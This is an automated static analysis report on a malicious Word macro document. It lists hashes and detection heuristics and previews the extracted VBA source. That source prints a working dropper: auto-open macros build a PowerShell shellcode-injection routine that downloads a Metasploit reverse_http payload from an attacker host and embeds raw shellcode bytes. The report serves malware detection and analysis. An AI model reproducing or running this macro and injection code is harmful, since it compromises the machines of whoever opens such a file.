Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6888c9130fab53c6…

MALICIOUS

Office (OLE)

84.5 KB Created: 2017-10-21 22:15:00 Authoring application: Microsoft Office Word First seen: 2017-10-28
MD5: c89e115dd9abb2acfb7aeaed42ab5eba SHA-1: 74ab91b7dec21536c4f7ca2084b146421c0dfd11 SHA-256: 6888c9130fab53c64ebf2de9260123e3f64071e8409d91379c1b9d795c4123a5
666 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File T1087.001 Local Account T1059.001 PowerShell

The sample contains multiple VBA macros designed to execute code, including references to PowerShell and WMI for process creation. The AutoOpen, Auto_Open, and Document_Open macros all call a function 'P' which appears to construct and execute PowerShell commands. The reconstructed PowerShell command includes a reference to '192.168.1.29.1' which is likely a C2 server for a reverse HTTP meterpreter payload. The presence of VirtualAlloc and WriteProcessMemory API calls suggests the execution of shellcode.

Heuristics 18

  • CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899
    Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
  • ClamAV: Doc.Dropper.Donoff-5743532-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743532-0
  • Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORY
    Reference to WriteProcessMemory API
  • Reference to CreateRemoteThread API critical SC_STR_CREATEREMOTETHREAD
    Reference to CreateRemoteThread API
  • VBA macros detected medium 8 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
            [Sy"
        jC = jC + "stem.Runtime.InteropServices.Marshal]::Copy($Shell"
        jC = jC + "code, 0, $BaseAddress, $Shellcode.Length)"
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
               "
        jC = jC + " if ((!$IsWow64) -and $PowerShell32bit)"
             "
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
    Matched line in script
        strComputer = "."
        Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
        Set objStartup = objWMIService.Get("Win32_ProcessStartup")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        strComputer = "."
        Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
        Set objStartup = objWMIService.Get("Win32_ProcessStartup")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
        P
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
        P
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub Auto_Open()
        P
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 32119 bytes
SHA-256: 68e73dbc0fe17466fea2dad8c4ecb16be3304933b8ffa998b4450b19207117d4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
    P
End Sub

Sub AutoOpen()
    P
End Sub

Sub Document_Open()
    P
End Sub

Public Function P() As Variant
    Dim jC As String
    jC = "function Invoke-Shellcode"
{
[CmdletBinding( Defa"
    jC = jC + "ultParameterSetName = 'RunLocal', SupportsShouldPr"
    jC = jC + "ocess = $True , ConfirmImpact = 'High')] Param ("
"
    jC = jC + "    [ValidateNotNullOrEmpty()]"
    [UInt16]
    "
    jC = jC + "$ProcessID,"
    [Parameter( ParameterSetName = 'R"
    jC = jC + "unLocal' )]"
    [ValidateNotNullOrEmpty()]
    ["
    jC = jC + "Byte[]]"
    $Shellcode,
    [Parameter( Paramete"
    jC = jC + "rSetName = 'Metasploit' )]"
    [ValidateSet( 'win"
    jC = jC + "dows/meterpreter/reverse_http',"
                 "
    jC = jC + " 'windows/meterpreter/reverse_https',"
           "
    jC = jC + "       IgnoreCase = $True )]"
    [String]
    $P"
    jC = jC + "ayload = 'windows/meterpreter/reverse_http',"
    "
    jC = jC + "[Parameter( ParameterSetName = 'ListPayloads' )]"
"
    jC = jC + "    [Switch]"
    $ListMetasploitPayloads,
    [P"
    jC = jC + "arameter( Mandatory = $True,"
                Para ""
    jC = jC + "meterSetName = 'Metasploit' )]"
    [ValidateNotNu"
    jC = jC + "llOrEmpty()]"
    [String]
    $Lhost = '192.168.1.29."
    jC = jC + "1',"
    [Parameter( Mandatory = $True,
         "
    jC = jC + "       ParameterSetName = 'Metasploit' )]"
    [Va"
    jC = jC + "lidateRange( 1,65535 )]"
    [Int]
    $Lport = 80"
    jC = jC + "443,"
    [Parameter( ParameterSetName = 'Metasplo"
    jC = jC + "it' )]"
    [ValidateNotNull()]
    [String]
   "
    jC = jC + " $UserAgent = (Get-ItemProperty -Path 'HKCU:\Softw"
    jC = jC + "are\Microsoft\Windows\CurrentVersion\Internet Sett"
    jC = jC + "ings').'User Agent',"
    [Parameter( ParameterSet"
    jC = jC + "Name = 'Metasploit' )]"
    [ValidateNotNull()]
 "
    jC = jC + "   [Switch]"
    $Legacy = $False,
    [Parameter"
    jC = jC + "( ParameterSetName = 'Metasploit' )]"
    [Validat"
    jC = jC + "eNotNull()]"
    [Switch]
    $Proxy = $False,
 "
    jC = jC + "   [Switch]"
    $Force = $False
)
    Set-Stric"
    jC = jC + "tMode -Version 2.0"
    if ($PsCmdlet.ParameterSet"
    jC = jC + "Name -eq 'ListPayloads')"
    {
        $Availabl"
    jC = jC + "ePayloads = (Get-Command Invoke-Shellcode).Paramet"
    jC = jC + "ers['Payload'].Attributes |"
            Where-Obj"
    jC = jC + "ect {$_.TypeId -eq [System.Management.Automation.V"
    jC = jC + "alidateSetAttribute]}"
        foreach ($Payload i"
    jC = jC + "n $AvailablePayloads.ValidValues)"
        {
    "
    jC = jC + "        New-Object PSObject -Property @{ Payloads "
    jC = jC + "= $Payload }"
        }
        Return
    }
  "
    jC = jC + "  if ( $PSBoundParameters['ProcessID'] )"
    {
 "
    jC = jC + "       Get-Process -Id $ProcessID -ErrorAction Sto"
    jC = jC + "p | Out-Null"
    }
    function Local:Get-Delega"
    jC = jC + "teType"
    {
        Param
        (
         "
    jC = jC + "   [OutputType([Type])]"
            [Parameter( P"
    jC = jC + "osition = 0)]"
            [Type[]]
            $"
    jC = jC + "Parameters = (New-Object Type[](0)),"
            "
    jC = jC + "[Parameter( Position = 1 )]"
            [Type]
 "
    jC = jC + "           $ReturnType = [Void]"
        )
      "
    jC = jC + "  $Domain = [AppDomain]::CurrentDomain"
        $D"
    jC = jC + "ynAssembly = New-Object System.Reflection.Assembly"
    jC = jC + "Name('ReflectedDelegate')"
        $AssemblyBuilde"
    jC = jC + "r = $Domain.DefineDynamicAssembly($DynAssembly, [S"
    jC = jC + "ystem.Reflection.Emit.AssemblyBuilderAccess]::Run)"
    jC = jC + ""
        $ModuleBuilder = $AssemblyBuilder.Define"
    jC = jC + "DynamicModule('InMemoryModule', $false)"
        $"
    jC = jC + "TypeBuilder = $ModuleBuilder.DefineType('MyDelegat"
    jC = jC + "eType', 'Class, Public, Sealed, AnsiClass, AutoCla"
    jC = jC + "ss', [System.MulticastDelegate])"
        $Constru"
    jC = jC + "ctorBuilder = $TypeBuilder.DefineConstructor('RTSp"
    jC = jC + "ecialName, HideBySig, Public', [System.Reflection."
    jC = jC + "CallingConventions]::Standard, $Parameters)"
     "
    jC = jC + "   $ConstructorBuilder.SetImplementationFlags('Run"
    jC = jC + "time, Managed')"
        $MethodBuilder = $TypeBui"
    jC = jC + "lder.DefineMethod('Invoke', 'Public, HideBySig, Ne"
    jC = jC + "wSlot, Virtual', $ReturnType, $Parameters)"
      "
    jC = jC + "  $MethodBuilder.SetImplementationFlags('Runtime, "
    jC = jC + "Managed')"
        Write-Output $TypeBuilder.Creat"
    jC = jC + "eType()"
    }
    function Local:Get-ProcAddress"
    jC = jC + ""
    {
        Param
        (
            [Ou"
    jC = jC + "tputType([IntPtr])]"
            [Parameter( Posit"
    jC = jC + "ion = 0, Mandatory = $True )]"
            [String"
    jC = jC + "]"
            $Module,
            [Parameter( P"
    jC = jC + "osition = 1, Mandatory = $True )]"
            [St"
    jC = jC + "ring]"
            $Procedure
        )
        "
    jC = jC + "$SystemAssembly = [AppDomain]::CurrentDomain.GetAs"
    jC = jC + "semblies() |"
            Where-Object { $_.Global"
    jC = jC + "AssemblyCache -And $_.Location.Split('\\')[-1].Equ"
    jC = jC + "als('System.dll') }"
        $UnsafeNativeMethods "
    jC = jC + "= $SystemAssembly.GetType('Microsoft.Win32.UnsafeN"
    jC = jC + "ativeMethods')"
        $GetModuleHandle = $Unsafe"
    jC = jC + "NativeMethods.GetMethod('GetModuleHandle')"
      "
    jC = jC + "  $GetProcAddress = $UnsafeNativeMethods.GetMethod"
    jC = jC + "('GetProcAddress')"
        $Kern32Handle = $GetMo"
    jC = jC + "duleHandle.Invoke($null, @($Module))"
        $tmp"
    jC = jC + "Ptr = New-Object IntPtr"
        $HandleRef = New-"
    jC = jC + "Object System.Runtime.InteropServices.HandleRef($t"
    jC = jC + "mpPtr, $Kern32Handle)"
        Write-Output $GetPr"
    jC = jC + "ocAddress.Invoke($null, @([System.Runtime.InteropS"
    jC = jC + "ervices.HandleRef]$HandleRef, $Procedure))"
    }
"
    jC = jC + ""
    function Local:Emit-CallThreadStub ([IntPtr] "
    jC = jC + "$BaseAddr, [IntPtr] $ExitThreadAddr, [Int] $Archit"
    jC = jC + "ecture)"
    {
        $IntSizePtr = $Architectur"
    jC = jC + "e / 8"
        function Local:ConvertTo-LittleEndi"
    jC = jC + "an ([IntPtr] $Address)"
        {
            $Li"
    jC = jC + "ttleEndianByteArray = New-Object Byte[](0)"
      "
    jC = jC + "      $Address.ToString("X$($IntSizePtr*2)") -spli"
    jC = jC + "t '([A-F0-9]{2})' | ForEach-Object { if ($_) { $Li"
    jC = jC + "ttleEndianByteArray += [Byte] ('0x{0}' -f $_) } }"
"
    jC = jC + ""
            [System.Array]::Reverse($LittleEndian"
    jC = jC + "ByteArray)"
            Write-Output $LittleEndian"
    jC = jC + "ByteArray"
        }
        $CallStub = New-Obje"
    jC = jC + "ct Byte[](0)"
        if ($IntSizePtr -eq 8)
    "
    jC = jC + "    {"
            [Byte[]] $CallStub = 0x48,0xB8 "
    jC = jC + "                     # MOV   QWORD RAX, &shellcode"
    jC = jC + ""
            $CallStub += ConvertTo-LittleEndian "
    jC = jC + "$BaseAddr       # &shellcode"
            $CallStu"
    jC = jC + "b += 0xFF,0xD0                              # CALL"
    jC = jC + "  RAX"
            $CallStub += 0x6A,0x00         "
    jC = jC + "                     # PUSH  BYTE 0"
            $"
    jC = jC + "CallStub += 0x48,0xB8                             "
    jC = jC + " # MOV   QWORD RAX, &ExitThread"
            $Call"
    jC = jC + "Stub += ConvertTo-LittleEndian $ExitThreadAddr # &"
    jC = jC + "ExitThread"
            $CallStub += 0xFF,0xD0    "
    jC = jC + "                          # CALL  RAX"
        }
"
    jC = jC + "        else"
        {
            [Byte[]] $Cal"
    jC = jC + "lStub = 0xB8                           # MOV   DWO"
    jC = jC + "RD EAX, &shellcode"
            $CallStub += Conve"
    jC = jC + "rtTo-LittleEndian $BaseAddr       # &shellcode"
  "
    jC = jC + "          $CallStub += 0xFF,0xD0                  "
    jC = jC + "            # CALL  EAX"
            $CallStub += "
    jC = jC + "0x6A,0x00                              # PUSH  BYT"
    jC = jC + "E 0"
            $CallStub += 0xB8                "
    jC = jC + "                   # MOV   DWORD EAX, &ExitThread"
"
    jC = jC + ""
            $CallStub += ConvertTo-LittleEndian $"
    jC = jC + "ExitThreadAddr # &ExitThread"
            $CallStu"
    jC = jC + "b += 0xFF,0xD0                              # CALL"
    jC = jC + "  EAX"
        }
        Write-Output $CallStub
"
    jC = jC + "    }"
    function Local:Inject-RemoteShellcode ("
    jC = jC + "[Int] $ProcessID)"
    {
        $hProcess = $Ope"
    jC = jC + "nProcess.Invoke(0x001F0FFF, $false, $ProcessID) # "
    jC = jC + "ProcessAccessFlags.All (0x001F0FFF)"
        if (!"
    jC = jC + "$hProcess)"
        {
            Throw "Unable t"
    jC = jC + "o open a process handle for PID: $ProcessID"
    "
    jC = jC + "    }"
        $IsWow64 = $false
        if ($64b"
    jC = jC + "itCPU) # Only perform theses checks if CPU is 64-b"
    jC = jC + "it"
        {
            $IsWow64Process.Invoke("
    jC = jC + "$hProcess, [Ref] $IsWow64) | Out-Null"
           "
    jC = jC + " if ((!$IsWow64) -and $PowerShell32bit)"
         "
    jC = jC + "   {"
                Throw 'Unable to inject 64-b"
    jC = jC + "it shellcode from within 32-bit Powershell. Use th"
    jC = jC + "e 64-bit version of Powershell if you want this to"
    jC = jC + " work.'"
            }
            elseif ($IsWow"
    jC = jC + "64) # 32-bit Wow64 process"
            {
       "
    jC = jC + "         if ($Shellcode32.Length -eq 0)"
         "
    jC = jC + "       {"
                    Throw 'No shellcode "
    jC = jC + "was placed in the $Shellcode32 variable!'"
       "
    jC = jC + "         }"
                $Shellcode = $Shellcod"
    jC = jC + "e32"
            }
            else # 64-bit proc"
    jC = jC + "ess"
            {
                if ($Shellcode"
    jC = jC + "64.Length -eq 0)"
                {
             "
    jC = jC + "       Throw 'No shellcode was placed in the $Shel"
    jC = jC + "lcode64 variable!'"
                }
           "
    jC = jC + "     $Shellcode = $Shellcode64"
            }
   "
    jC = jC + "     }"
        else # 32-bit CPU
        {
    "
    jC = jC + "        if ($Shellcode32.Length -eq 0)"
          "
    jC = jC + "  {"
                Throw 'No shellcode was place"
    jC = jC + "d in the $Shellcode32 variable!'"
            }
 "
    jC = jC + "           $Shellcode = $Shellcode32"
        }
 "
    jC = jC + "       $RemoteMemAddr = $VirtualAllocEx.Invoke($hP"
    jC = jC + "rocess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3"
    jC = jC + "000, 0x40) # (Reserve|Commit, RWX)"
        if (!$"
    jC = jC + "RemoteMemAddr)"
        {
            Throw "Unab"
    jC = jC + "le to allocate shellcode memory in PID: $ProcessID"
    jC = jC + ""
        }
        $WriteProcessMemory.Invoke($"
    jC = jC + "hProcess, $RemoteMemAddr, $Shellcode, $Shellcode.L"
    jC = jC + "ength, [Ref] 0) | Out-Null"
        $ExitThreadAdd"
    jC = jC + "r = Get-ProcAddress kernel32.dll ExitThread"
     "
    jC = jC + "   if ($IsWow64)"
        {
            $CallStub"
    jC = jC + " = Emit-CallThreadStub $RemoteMemAddr $ExitThreadA"
    jC = jC + "ddr 32"
        }
        Else
        {
      "
    jC = jC + "      $CallStub = Emit-CallThreadStub $RemoteMemAd"
    jC = jC + "dr $ExitThreadAddr 64"
        }
        $RemoteS"
    jC = jC + "tubAddr = $VirtualAllocEx.Invoke($hProcess, [IntPt"
    jC = jC + "r]::Zero, $CallStub.Length, 0x3000, 0x40) # (Reser"
    jC = jC + "ve|Commit, RWX)"
        if (!$RemoteStubAddr)
  "
    jC = jC + "      {"
            Throw "Unable to allocate thr"
    jC = jC + "ead call stub memory in PID: $ProcessID"
        "
    jC = jC + "}"
        $WriteProcessMemory.Invoke($hProcess, $"
    jC = jC + "RemoteStubAddr, $CallStub, $CallStub.Length, [Ref]"
    jC = jC + " 0) | Out-Null"
        $ThreadHandle = $CreateRem"
    jC = jC + "oteThread.Invoke($hProcess, [IntPtr]::Zero, 0, $Re"
    jC = jC + "moteStubAddr, $RemoteMemAddr, 0, [IntPtr]::Zero)"
"
    jC = jC + "        if (!$ThreadHandle)"
        {
          "
    jC = jC + "  Throw "Unable to launch remote thread in PID: $P"
    jC = jC + "rocessID"
        }
        $CloseHandle.Invoke("
    jC = jC + "$hProcess) | Out-Null"
    }
    function Local:I"
    jC = jC + "nject-LocalShellcode"
    {
        if ($PowerShe"
    jC = jC + "ll32bit) {"
            if ($Shellcode32.Length -e"
    jC = jC + "q 0)"
            {
                Throw 'No she"
    jC = jC + "llcode was placed in the $Shellcode32 variable!'"
"
    jC = jC + "                return"
            }
           "
    jC = jC + " $Shellcode = $Shellcode32"
        }
        els ""
    jC = jC + "e"
        {
            if ($Shellcode64.Length "
    jC = jC + "-eq 0)"
            {
                Throw 'No s"
    jC = jC + "hellcode was placed in the $Shellcode64 variable!'"
    jC = jC + ""
                Return
            }
         "
    jC = jC + "   $Shellcode = $Shellcode64"
        }
        $"
    jC = jC + "BaseAddress = $VirtualAlloc.Invoke([IntPtr]::Zero,"
    jC = jC + " $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|C"
    jC = jC + "ommit, RWX)"
        if (!$BaseAddress)
        {"
    jC = jC + ""
            Throw "Unable to allocate shellcode "
    jC = jC + "memory in PID: $ProcessID"
        }
        [Sy"
    jC = jC + "stem.Runtime.InteropServices.Marshal]::Copy($Shell"
    jC = jC + "code, 0, $BaseAddress, $Shellcode.Length)"
       "
    jC = jC + " $ExitThreadAddr = Get-ProcAddress kernel32.dll Ex"
    jC = jC + "itThread"
        if ($PowerShell32bit)
        {"
    jC = jC + ""
            $CallStub = Emit-CallThreadStub $Bas"
    jC = jC + "eAddress $ExitThreadAddr 32"
        }
        el ""
    jC = jC + "se"
        {
            $CallStub = Emit-CallTh"
    jC = jC + "readStub $BaseAddress $ExitThreadAddr 64"
        "
    jC = jC + "}"
        $CallStubAddress = $VirtualAlloc.Invoke"
    jC = jC + "([IntPtr]::Zero, $CallStub.Length + 1, 0x3000, 0x4"
    jC = jC + "0) # (Reserve|Commit, RWX)"
        if (!$CallStub"
    jC = jC + "Address)"
        {
            Throw "Unable to "
    jC = jC + "allocate thread call stub."
        }
        [S"
    jC = jC + "ystem.Runtime.InteropServices.Marshal]::Copy($Call"
    jC = jC + "Stub, 0, $CallStubAddress, $CallStub.Length)"
    "
    jC = jC + "    $ThreadHandle = $CreateThread.Invoke([IntPtr]:"
    jC = jC + ":Zero, 0, $CallStubAddress, $BaseAddress, 0, [IntP"
    jC = jC + "tr]::Zero)"
        if (!$ThreadHandle)
        {"
    jC = jC + ""
            Throw "Unable to launch thread."
  "
    jC = jC + "      }"
        $WaitForSingleObject.Invoke($Thre"
    jC = jC + "adHandle, 0xFFFFFFFF) | Out-Null"
        $Virtual"
    jC = jC + "Free.Invoke($CallStubAddress, $CallStub.Length + 1"
    jC = jC + ", 0x8000) | Out-Null # MEM_RELEASE (0x8000)"
     "
    jC = jC + "   $VirtualFree.Invoke($BaseAddress, $Shellcode.Le"
    jC = jC + "ngth + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000"
    jC = jC + ")"
    }
    $IsWow64ProcessAddr = Get-ProcAddres"
    jC = jC + "s kernel32.dll IsWow64Process"
    if ($IsWow64Pro"
    jC = jC + "cessAddr)"
    {
        $IsWow64ProcessDelegate "
    jC = jC + "= Get-DelegateType @([IntPtr], [Bool].MakeByRefTyp"
    jC = jC + "e()) ([Bool])"
        $IsWow64Process = [System.R"
    jC = jC + "untime.InteropServices.Marshal]::GetDelegateForFun"
    jC = jC + "ctionPointer($IsWow64ProcessAddr, $IsWow64ProcessD"
    jC = jC + "elegate)"
        $64bitCPU = $true
    }
    el ""
    jC = jC + "se"
    {
        $64bitCPU = $false
    }
    "
    jC = jC + "if ([IntPtr]::Size -eq 4)"
    {
        $PowerSh"
    jC = jC + "ell32bit = $true"
    }
    Else
    {
        "
    jC = jC + "$PowerShell32bit = $false"
    }
    if ($PsCmdle"
    jC = jC + "t.ParameterSetName -eq 'Metasploit')"
    {
     "
    jC = jC + "   if (!$PowerShell32bit) {"
            $RootInvo"
    jC = jC + "cation = $MyInvocation.Line"
            $Response"
    jC = jC + " = $True"
            if ( $Force -or ( $Response "
    jC = jC + "= $psCmdlet.ShouldContinue( "Do you want to launch"
    jC = jC + " the payload from x86 Powershell?",
             "
    jC = jC + "      "Attempt to execute 32-bit shellcode from 64"
    jC = jC + "-bit Powershell. Note: This process takes about on"
    jC = jC + "e minute. Be patient! You will also see some artif"
    jC = jC + "acts of the script loading in the other process." "
    jC = jC + ") ) ) { }"
            if ( !$Response )
        "
    jC = jC + "    {"
                Return
            }
    "
    jC = jC + "        if ($MyInvocation.BoundParameters['Force']"
    jC = jC + ")"
            {
                $Command = "func"
    jC = jC + "tion $($MyInvocation.InvocationName) {`n" + $MyInv"
    jC = jC + "ocation.MyCommand.ScriptBlock + "`n}`n$($RootInvoc"
    jC = jC + "ation)`n`n"
            }
            Else
    "
    jC = jC + "        {"
                $Command = "function $("
    jC = jC + "$MyInvocation.InvocationName) {`n" + $MyInvocation"
    jC = jC + ".MyCommand.ScriptBlock + "`n}`n$($RootInvocation) "
    jC = jC + "-Force`n`n"
            }
            $CommandBy"
    jC = jC + "tes = [System.Text.Encoding]::Ascii.GetBytes($Comm"
    jC = jC + "and)"
            $EncodedCommand = [Convert]::ToB"
    jC = jC + "ase64String($CommandBytes)"
            $Execute ="
    jC = jC + " '$Command' + " | $Env:windir\SysWOW64\WindowsPowe"
    jC = jC + "rShell\v1.0\powershell.exe -NoProfile -Command -"
"
    jC = jC + ""
            Invoke-Expression -Command $Execute |"
    jC = jC + " Out-Null"
            Return
        }
        "
    jC = jC + "$Response = $True"
        if ( $Force -or ( $Resp"
    jC = jC + "onse = $psCmdlet.ShouldContinue( "Do you know what"
    jC = jC + " you're doing?",
               "About to downloa"
    jC = jC + "d Metasploit payload '$($Payload)' LHOST=$($Lhost)"
    jC = jC + ", LPORT=$($Lport)" ) ) ) { }
        if ( !$Respo"
    jC = jC + "nse )"
        {
            Return
        }
 "
    jC = jC + "       switch ($Payload)"
        {
            '"
    jC = jC + "windows/meterpreter/reverse_http'"
            {
"
    jC = jC + "                $SSL = ''"
            }
        "
    jC = jC + "    'windows/meterpreter/reverse_https'"
         "
    jC = jC + "   {"
                $SSL = 's'
                "
    jC = jC + "[System.Net.ServicePointManager]::ServerCertificat"
    jC = jC + "eValidationCallback = {$True}"
            }
    "
    jC = jC + "    }"
        if ($Legacy)
        {
         "
    jC = jC + "   $Request = "http$($SSL)://$($Lhost):$($Lport)/I"
    jC = jC + "NITM"
        } else {
            $CharArray = "
    jC = jC + "48..57 + 65..90 + 97..122 | ForEach-Object {[Char]"
    jC = jC + "$_}"
            $SumTest = $False
            wh ""
    jC = jC + "ile ($SumTest -eq $False) "
            {
       "
    jC = jC + "         $GeneratedUri = $CharArray | Get-Random -"
    jC = jC + "Count 4"
                $SumTest = (([int[]] $Gen"
    jC = jC + "eratedUri | Measure-Object -Sum).Sum % 0x100 -eq 9"
    jC = jC + "2)"
            }
            $RequestUri = -join"
    jC = jC + " $GeneratedUri"
            $Request = "http$($SSL"
    jC = jC + ")://$($Lhost):$($Lport)/$($RequestUri)"
        "
    jC = jC + "}"
        $Uri = New-Object Uri($Request)
      "
    jC = jC + "  $WebClient = New-Object System.Net.WebClient"
  "
    jC = jC + "      $WebClient.Headers.Add('user-agent', "$UserA"
    jC = jC + "gent")
        if ($Proxy)
        {
          "
    jC = jC + "  $WebProxyObject = New-Object System.Net.WebProxy"
    jC = jC + ""
            $ProxyAddress = (Get-ItemProperty -P"
    jC = jC + "ath 'HKCU:\Software\Microsoft\Windows\CurrentVersi"
    jC = jC + "on\Internet Settings').ProxyServer"
            if"
    jC = jC + " ($ProxyAddress) "
            {
                "
    jC = jC + "$WebProxyObject.Address = $ProxyAddress"
         "
    jC = jC + "       $WebProxyObject.UseDefaultCredentials = $Tr"
    jC = jC + "ue"
                $WebClientObject.Proxy = $WebP"
    jC = jC + "roxyObject"
            }
        }
        try
"
    jC = jC + ""
        {
            [Byte[]] $Shellcode32 = $W"
    jC = jC + "ebClient.DownloadData($Uri)"
        }
        ca ""
    jC = jC + "tch"
        {
            Throw "$($Error[0].Exc"
    jC = jC + "eption.InnerException.InnerException.Message)"
  "
    jC = jC + "      }"
        [Byte[]] $Shellcode64 = $Shellcod"
    jC = jC + "e32"
    }
    elseif ($PSBoundParameters['Shellc"
    jC = jC + "ode'])"
    {
        [Byte[]] $Shellcode32 = $Sh"
    jC = jC + "ellcode"
        [Byte[]] $Shellcode64 = $Shellcod"
    jC = jC + "e32"
    }
    Else
    {
        [Byte[]] $She"
    jC = jC + "llcode32 = @(0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x"
    jC = jC + "89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,"
     "
    jC = jC + "                             0x52,0x0c,0x8b,0x52,0"
    jC = jC + "x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0"
    jC = jC + "x31,0xc0,"
0                                  xac , ""
    jC = jC + "0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,"
    jC = jC + "0xc7,0xe2,0xf0,0x52,0x57,"
                       "
    jC = jC + "           0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0"
    jC = jC + ",0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,"
       "
    jC = jC + "                           0xd0,0x50,0x8b,0x48,0x1"
    jC = jC + "8,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x3"
    jC = jC + "4,0x8b,"
                                  0x01,0x"
    jC = jC + "d6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0x"
    jC = jC + "c7,0x38,0xe0,0x75,0xf4,"
                         "
    jC = jC + "         0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0"
    jC = jC + "x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,"
         "
    jC = jC + "                         0x0c,0x4b,0x8b,0x58,0x1c,"
    jC = jC + "0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,"
    jC = jC + "0x24,"
                                  0x5b,0x5b"
    jC = jC + ",0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b"
    jC = jC + ",0x12,0xeb,0x86,0x5d,"
                           "
    jC = jC + "       0x6a,0x01,0x8d,0x85,0xb9,0x00,0x00,0x00,0x5"
    jC = jC + "0,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,"
           "
    jC = jC + "                       0xbb,0xe0,0x1d,0x2a,0x0a,0x"
    jC = jC + "68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x"
    jC = jC + "0a,"
                                  0x80,0xfb,0"
    jC = jC + "xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0"
    jC = jC + "x53,0xff,0xd5,0x63,"
                             "
    jC = jC + "     0x61,0x6c,0x63,0x00)"
        [Byte[]] $Shell"
    jC = jC + "code64 = @(0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00"
    jC = jC + ",0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,"
       "
    jC = jC + "                           0x56,0x48,0x31,0xd2,0x6"
    jC = jC + "5,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8"
    jC = jC + "b,0x52,"
                                  0x20,0x"
    jC = jC + "48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x"
    jC = jC + "31,0xc9,0x48,0x31,0xc0,"
                         "
    jC = jC + "         0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0"
    jC = jC + "xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,"
         "
    jC = jC + "                         0x52,0x41,0x51,0x48,0x8b,"
    jC = jC + "0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,"
    jC = jC + "0x88,"
                                  0x00,0x00"
    jC = jC + ",0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50"
    jC = jC + ",0x8b,0x48,0x18,0x44,"
                           "
    jC = jC + "       0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x4"
    jC = jC + "8,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,"
           "
    jC = jC + "                       0x01,0xd6,0x4d,0x31,0xc9,0x"
